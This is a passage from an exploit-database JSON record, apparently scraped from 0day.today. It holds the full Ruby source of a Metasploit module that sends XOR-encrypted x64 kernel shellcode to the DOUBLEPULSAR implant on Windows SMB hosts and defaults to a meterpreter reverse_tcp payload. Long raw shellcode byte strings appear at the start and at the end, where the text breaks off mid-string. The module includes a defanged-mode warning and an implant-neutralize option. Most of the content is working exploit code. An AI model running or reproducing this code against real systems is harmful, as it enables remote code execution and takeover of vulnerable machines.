\"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-10] #"}, "lastseen": "2021-09-09T22:14:51", "differentElements": ["sourceData"], "edition": 12}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "89b150871bc89d1eed6b6e98db6caf24", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-10T22:13:26", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27803", "1337DAY-ID-27786", 
"1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-10T22:13:26", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-10T22:13:26", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current 
source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 
'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n 